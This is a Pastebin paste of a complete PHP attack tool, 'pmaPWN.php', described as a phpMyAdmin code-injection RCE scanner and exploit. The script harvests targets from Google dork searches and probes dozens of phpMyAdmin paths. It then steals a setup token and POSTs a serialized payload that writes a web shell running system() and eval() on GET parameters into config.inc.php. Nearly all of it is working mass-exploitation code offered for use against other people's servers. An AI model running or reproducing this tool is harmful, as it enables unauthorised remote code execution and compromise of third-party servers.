API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 31st, 2014
192
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.40 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. $list = array(
  4. '/phpmyadmin/',
  5. '/phpMyAdmin/',
  6. '/PMA/',
  7. '/pma/',
  8. '/admin/',
  9. '/dbadmin/',
  10. '/mysql/',
  11. '/myadmin/',
  12. '/phpmyadmin2/',
  13. '/phpMyAdmin2/',
  14. '/phpMyAdmin-2/',
  15. '/php-my-admin/',
  16. '/phpMyAdmin-2.2.3/',
  17. '/phpMyAdmin-2.2.6/',
  18. '/phpMyAdmin-2.5.1/',
  19. '/phpMyAdmin-2.5.4/',
  20. '/phpMyAdmin-2.5.5-rc1/',
  21. '/phpMyAdmin-2.5.5-rc2/',
  22. '/phpMyAdmin-2.5.5/',
  23. '/phpMyAdmin-2.5.5-pl1/',
  24. '/phpMyAdmin-2.5.6-rc1/',
  25. '/phpMyAdmin-2.5.6-rc2/',
  26. '/phpMyAdmin-2.5.6/',
  27. '/phpMyAdmin-2.5.7/',
  28. '/phpMyAdmin-2.5.7-pl1/',
  29. '/phpMyAdmin-2.6.0-alpha/',
  30. '/phpMyAdmin-2.6.0-alpha2/',
  31. '/phpMyAdmin-2.6.0-beta1/',
  32. '/phpMyAdmin-2.6.0-beta2/',
  33. '/phpMyAdmin-2.6.0-rc1/',
  34. '/phpMyAdmin-2.6.0-rc2/',
  35. '/phpMyAdmin-2.6.0-rc3/',
  36. '/phpMyAdmin-2.6.0/',
  37. '/phpMyAdmin-2.6.0-pl1/',
  38. '/phpMyAdmin-2.6.0-pl2/',
  39. '/phpMyAdmin-2.6.0-pl3/',
  40. '/phpMyAdmin-2.6.1-rc1/',
  41. '/phpMyAdmin-2.6.1-rc2/',
  42. '/phpMyAdmin-2.6.1/',
  43. '/phpMyAdmin-2.6.1-pl1/',
  44. '/phpMyAdmin-2.6.1-pl2/',
  45. '/phpMyAdmin-2.6.1-pl3/',
  46. '/phpMyAdmin-2.6.2-rc1/',
  47. '/phpMyAdmin-2.6.2-beta1/',
  48. '/phpMyAdmin-2.6.2-rc1/',
  49. '/phpMyAdmin-2.6.2/',
  50. '/phpMyAdmin-2.6.2-pl1/',
  51. '/phpMyAdmin-2.6.3/',
  52. '/phpMyAdmin-2.6.3-rc1/',
  53. '/phpMyAdmin-2.6.3/',
  54. '/phpMyAdmin-2.6.3-pl1/',
  55. '/phpMyAdmin-2.6.4-rc1/',
  56. '/phpMyAdmin-2.6.4-pl1/',
  57. '/phpMyAdmin-2.6.4-pl2/',
  58. '/phpMyAdmin-2.6.4-pl3/',
  59. '/phpMyAdmin-2.6.4-pl4/',
  60. '/phpMyAdmin-2.6.4/',
  61. '/phpMyAdmin-2.7.0-beta1/',
  62. '/phpMyAdmin-2.7.0-rc1/',
  63. '/phpMyAdmin-2.7.0-pl1/',
  64. '/phpMyAdmin-2.7.0-pl2/',
  65. '/phpMyAdmin-2.7.0/',
  66. '/phpMyAdmin-2.8.0-beta1/',
  67. '/phpMyAdmin-2.8.0-rc1/',
  68. '/phpMyAdmin-2.8.0-rc2/',
  69. '/phpMyAdmin-2.8.0/',
  70. '/phpMyAdmin-2.8.0.1/',
  71. '/phpMyAdmin-2.8.0.2/',
  72. '/phpMyAdmin-2.8.0.3/',
  73. '/phpMyAdmin-2.8.0.4/',
  74. '/phpMyAdmin-2.8.1-rc1/',
  75. '/phpMyAdmin-2.8.1/',
  76. '/phpMyAdmin-2.8.2/',
  77. '/sqlmanager/',
  78. '/mysqlmanager/',
  79. '/p/m/a/',
  80. '/PMA2005/',
  81. '/pma2005/',
  82. '/phpmanager/',
  83. '/php-myadmin/',
  84. '/phpmy-admin/',
  85. '/webadmin/',
  86. '/sqlweb/',
  87. '/websql/',
  88. '/webdb/',
  89. '/mysqladmin/',
  90. '/mysql-admin/',
  91. );
  92.  
  93. if($argc > 1) {
  94. print "|****************************************************************|\n";
  95. print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
  96. print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
  97. print " This is PHP version original http://milw0rm.com/exploits/8921\n";
  98. print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
  99. print " greetz: Hacking Expose!, HM Security, darkc0de\n";
  100. print "|****************************************************************|\n";
  101. print "\n";
  102. print "Usage: php $argv[0] \n";
  103. exit;
  104. }
  105.  
  106. print "|****************************************************************|\n";
  107. print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
  108. print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
  109. print " This is PHP version original http://milw0rm.com/exploits/8921\n";
  110. print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
  111. print " greetz: Hacking Expose!, HM Security, darkc0de\n";
  112. print "|****************************************************************|\n";
  113. print "\n";
  114. $Handlex = FOpen("pmaPWN.log", "a+");
  115. FWrite($Handlex, "|****************************************************************|\n");
  116. FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
  117. FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
  118. FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
  119. FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
  120. FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
  121. FWrite($Handlex, "|****************************************************************|\n\n");
  122. print "[-] Master, where you want to go today? \n";
  123. print "[-] example dork: intitle:phpMyAdmin \n";
  124. fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
  125. $dork = trim(fgets(STDIN));
  126. print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
  127. FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
  128. for($i = 0; $i <= 900; $i+=100) {
  129. $ch = curl_init();
  130. curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
  131. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  132. curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  133. curl_setopt($ch, CURLOPT_HEADER, 1);
  134. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  135. curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
  136. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
  137. $pg = curl_exec($ch);
  138. curl_close($ch);
  139.  
  140. if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }
  141. }
  142.  
  143. foreach($res as $key) {
  144. foreach($key as $target) {
  145. $total++;
  146. }
  147. }
  148. print "[+] Done. $total rows return.\n";
  149. FWrite($Handlex, "[+] Done. $total rows return.\n");
  150. FClose($Handlex);
  151. foreach($res as $key) {
  152. foreach($key as $target) {
  153. $Handlex = FOpen("pmaPWN.log", "a+");
  154. $real = parse_url($target);
  155. $url = "http://".$real['host'];
  156. print "\n[-] Scanning phpMyAdmin on ".$url."\n";
  157. FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");
  158. FClose($Handlex);
  159. sleep(5);
  160. $curlHandle = curl_multi_init();
  161. for ($i = 0;$i < count($list); $i++)
  162. $curl[$i] = addHandle($curlHandle,$url.$list[$i]);
  163. ExecHandle($curlHandle);
  164. for ($i = 0;$i < count($list); $i++)
  165. {
  166. $text[$i] = curl_multi_getcontent ($curl[$i]);
  167. //echo $url.$list[$i]."\n";
  168. $Handlex = FOpen("pmaPWN.log", "a+");
  169. if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
  170. print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";
  171. print "\n[+] Testing vulnerable, wait sec..\n";
  172. FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");
  173. FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
  174. if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
  175. print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";
  176. FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");
  177. }
  178. FClose($Handlex);
  179. exploit_site($url.$list[$i]);
  180. }
  181. }
  182. for ($i = 0;$i < count($list); $i++)//remove the handles
  183. curl_multi_remove_handle($curlHandle,$curl[$i]);
  184. curl_multi_close($curlHandle);
  185. sleep(5);
  186. }
  187. }
  188.  
  189. function addHandle(&$curlHandle,$url)
  190. {
  191. $cURL = curl_init();
  192. curl_setopt($cURL, CURLOPT_URL, $url);
  193. curl_setopt($cURL, CURLOPT_HEADER, 0);
  194. curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
  195. curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
  196. curl_multi_add_handle($curlHandle,$cURL);
  197. return $cURL;
  198. }
  199. //execute the handle until the flag passed
  200. // to function is greater then 0
  201. function ExecHandle(&$curlHandle)
  202. {
  203. $flag=null;
  204. do {
  205. //fetch pages in parallel
  206. curl_multi_exec($curlHandle,$flag);
  207. } while ($flag > 0);
  208. }
  209.  
  210. function exploit_site($url) {
  211. $ch = curl_init();
  212. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  213. curl_setopt($ch, CURLOPT_HEADER, 1);
  214. curl_setopt($ch, CURLOPT_TIMEOUT, 200);
  215. curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");
  216. $result = curl_exec($ch);
  217. curl_close($ch);
  218. $ch2 = curl_init();
  219. curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  220. curl_setopt($ch2, CURLOPT_HEADER, 1);
  221. curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
  222. curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");
  223. $result2 = curl_exec($ch2);
  224. curl_close($ch2);
  225. //print $url;
  226. if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
  227. print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
  228. print "\n[+] Exploiting, wait sec..\n";
  229. $Handlex = FOpen("pmaPWN.log", "a+");
  230. FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
  231. FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
  232. FClose($Handlex);
  233. exploit($url);
  234. }
  235. else {
  236. $Handlex = FOpen("pmaPWN.log", "a+");
  237. print "\n[-] Shit! no luck.. not vulnerable\n";
  238. FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
  239. FClose($Handlex);
  240. }
  241. }
  242.  
  243. function exploit($w00t) {
  244. $Handlex = FOpen("pmaPWN.log", "a+");
  245. $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
  246. //first get cookie + token
  247. $curl = curl_init();
  248. curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL
  249. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  250. curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  251. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  252. curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  253. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  254. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  255. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
  256. curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  257. curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  258. $result = curl_exec($curl);
  259. curl_close($curl);
  260. if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));
  261.  
  262. $token = $matches[1][1];
  263. if ($token != '') {
  264. print "\n[!] w00t! w00t! Got token = " . $matches[1][1];
  265. FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);
  266. $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
  267. print "\n[+] Sending evil payload mwahaha.. \n";
  268. FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
  269. $curl = curl_init();
  270. curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");
  271. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
  272. curl_setopt($curl, CURLOPT_TIMEOUT, 200);
  273. curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
  274. curl_setopt($curl, CURLOPT_REFERER, $w00t);
  275. curl_setopt($curl, CURLOPT_POST, true);
  276. curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
  277. curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
  278. curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
  279. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
  280. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  281. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  282. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  283. $result = curl_exec($curl);
  284. curl_close($curl);
  285.  
  286. print "\n[!] w00t! w00t! You should now have shell here";
  287. print "\n[+] ".$w00t."config/config.inc.php?c=id \n";
  288. print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";
  289. FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");
  290. FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");
  291.  
  292. }
  293. else {
  294. print "\n[!] Shit! no luck.. not vulnerable\n";
  295. FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");
  296. return false;
  297. }
  298. FClose($Handlex);
  299. if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }
  300. //exit();
  301. }
  302.  
  303. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!